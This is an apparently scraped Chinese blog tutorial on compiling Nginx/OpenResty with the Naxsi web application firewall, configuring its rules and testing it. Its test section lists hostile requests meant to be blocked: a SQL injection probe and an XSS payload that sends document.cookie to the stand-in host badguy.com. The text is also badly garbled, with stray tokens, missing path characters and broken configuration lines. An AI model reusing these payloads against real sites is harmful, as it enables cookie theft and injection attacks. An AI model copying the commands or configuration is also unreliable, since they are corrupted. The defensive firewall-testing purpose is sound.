二、下载Naxsi

@H_197_22@cd /@H_197_22@data0software
wget https://github.com/nbs-system/naxsi/archive/master.zip@H_197_22@
mv master naxsi-@H_197_22@master.@H_197_22@zip
unzip naxsizip

三、重新编译Nginx，加入naxsi模块

cd ngx_openresty-1.4.3.6@H_197_22@
./@H_197_22@configure --@H_197_22@user=@H_197_22@www --groupprefix=/usr/localopenresty withluajit http_stub_status_module http_ssl_module http_sub_module http_realip_module add-@H_343_76@module/data0/@H_197_22@naxsinaxsi_src
gmake
gmake install
cd ../

四、拷贝Naxsi的核心配置规则库

cp naxsi_confignaxsi_corerules usr/webserverNginxconf/

定义一个虚拟主机的安全规则

vi @H_49_28@mysiterules

内容如下：

#LearningMode; #Enables learning mode@H_197_22@
SecrulesEnabled;@H_197_22@
#SecrulesDisabled;DeniedUrl@H_197_22@ "/requestDenied"## check rulescheckRule@H_197_22@"$sql >= 8"@H_197_22@ BLOCK"$RFI >= 8"@H_197_22@"$TRAVERSAL >= 4"@H_197_22@"$EVADE >= 4"@H_197_22@"$XSS >= 8"@H_197_22@;

编辑Nginx.conf

conf

在http部分加入如下配置

include       rules;

完整的Nginx.conf如下

user  www www

worker_processes 8

error_log  data1logsNginx_errorlog  crit

pid        pid

#Specifies the value for maximum file descriptors that can be opened by this process.@H_197_22@
worker_rlimit_nofile 65535

events
{@H_197_22@
  use@H_197_22@ epoll
  worker_connections }@H_197_22@

http

  include       mimetypes
  include       
  default_type  applicationoctetstream

  #charset  gb2312;@H_197_22@
      
  server_names_hash_bucket_size 128
  client_header_buffer_size 32k
  large_client_header_buffers 4@H_197_22@ 
  client_max_body_size 8m
      
  sendfile on
  tcp_nopush     on

  keepalive_timeout 60

  tcp_nodelay on
  server_tokens off

  fastcgi_connect_timeout 300
  fastcgi_send_timeout 
  fastcgi_read_timeout 
  fastcgi_buffer_size 64k
  fastcgi_buffers 
  fastcgi_busy_buffers_size 128k
  fastcgi_temp_file_write_size 

  gzip on
  gzip_min_length  1k
  gzip_buffers     16k
  gzip_http_version 1.0
  gzip_comp_level 2
  gzip_types       textplain applicationxjavascript textcss applicationxml
  gzip_vary on#limit_zone  crawler  $binary_remote_addr  10m;@H_197_22@
  log_format  access  '$remote_addr - $remote_user [$time_local] "$request" '@H_197_22@
               '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '@H_197_22@'"$http_user_agent" $http_x_forWARDed_for "$server_name" "$http_host"'

  log_format  wwwlogs  
              

  server
  
    listen       80
    server_name  blogabccom
    index indexhtml indexhtm indexPHP
    root  htdocsblog

    #limit_conn   crawler  20;    @H_197_22@
                            
    LOCATIOn ~@H_197_22@ .*@H_197_22@\.(@H_197_22@|@H_197_22@PHP5)?@H_197_22@$
          
      #fastcgi_pass  unix:/tmp/php-cgi.sock;@H_197_22@
      fastcgi_pass  127.00.1:9000
      fastcgi_index index
      include fcgi
    
    
    LOCATIOn gifjpgjpegpngbmpswf)@H_197_22@
      expires      30d

    LOCATIOn jscss1h    

    access_log  accesslog  access
  

  server
  
    server_name  wwwwww
        include    
        proxy_pass http//127.0.0.1/;@H_197_22@
        proxy_set_header Host@H_197_22@ www    
    /requestDenied@H_197_22@
        return403
    access_log  log  wwwlogs
    error_log  @H_49_28@mysite_Nginx_errorlog debug

    access_log  wwwlogs
    listen  
    server_name  status
    stub_status on
    access_log   off}

五、启动Nginx

killall 9@H_197_22@ Nginx
sbinNginx

六、测试

http//www.abc.com/test.PHP?name=40/**/and/**/1=1  不通过，含有条件注入@H_197_22@
http//www.abc.com/test.PHP?name=%28%29            不通过，特殊字符@H_197_22@//www.abc.com/test.PHP?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E                                                   不通过，参数内容含脚本注入@H_197_22@//www.abc.com/test.PHP?title=Meta%20http-equiv=%22refresh%22%20content=%220;%22 不通过

可以到/data1/logs/mysite_Nginx_error.log查看naxsi过滤的请求

除非注明，本博客文章均为原创，转载请以链接形式标明本文地址 本文地址： http://blog.cnwyhx.com/?p=301